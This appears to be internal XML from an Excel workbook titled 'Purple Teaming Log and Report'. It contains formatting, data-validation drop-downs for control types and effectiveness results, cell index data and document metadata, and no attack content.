    <cfRule type="containsText" dxfId="0" priority="3" operator="containsText" text="effective">
      <formula>NOT(ISERROR(SEARCH("effective",I28)))</formula>
    </cfRule>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink ref="C17" r:id="rId1" xr:uid="{00000000-0004-0000-0000-000000000000}"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.511811023622047" footer="0.511811023622047"/>
  <pageSetup orientation="portrait" horizontalDpi="300" verticalDpi="300" r:id="rId2"/>
  <ignoredErrors>
    <ignoredError sqref="C5" numberStoredAsText="1"/>
  </ignoredErrors>
  <drawing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Please select a control type from the list" promptTitle="Control types" prompt="Please select a control type" xr:uid="{00000000-0002-0000-0000-000000000000}">
          <x14:formula1>
            <xm:f>Sheet1!$A$2:$A$5</xm:f>
          </x14:formula1>
          <xm:sqref>H32:H102</xm:sqref>
        </x14:dataValidation>
        <x14:dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" errorTitle="Invalid entry!" error="Please select a result from the list" promptTitle="Effectiveness result" prompt="Please select an effectiveness result from the list" xr:uid="{00000000-0002-0000-0000-000001000000}">
          <x14:formula1>
            <xm:f>Sheet1!$B$2:$B$6</xm:f>
          </x14:formula1>
          <xm:sqref>I32:I102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B10" sqref="B10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="12.26953125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="27.54296875" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A1" t="s">
        <v>144</v>
      </c>
      <c r="B1" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A2" t="s">
        <v>49</v>
      </c>
      <c r="B2" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="3" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A3" t="s">
        <v>145</v>
      </c>
      <c r="B3" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="4" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A4" t="s">
        <v>53</v>
      </c>
      <c r="B4" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="5" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A5" t="s">
        <v>147</v>
      </c>
      <c r="B5" t="s">
        <v>148</v>
      </c>
    </row>
    <row r="6" spans="1:2" x14ac:dyDescent="0.35">
      <c r="B6"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2</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="2" baseType="lpstr">
      <vt:lpstr>Purple Teaming Log and Report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dcterms:created xsi:type="dcterms:W3CDTF">2022-04-21T18:05:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-11T19:05:11Z</dcterms:modified>
  <cp:category/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>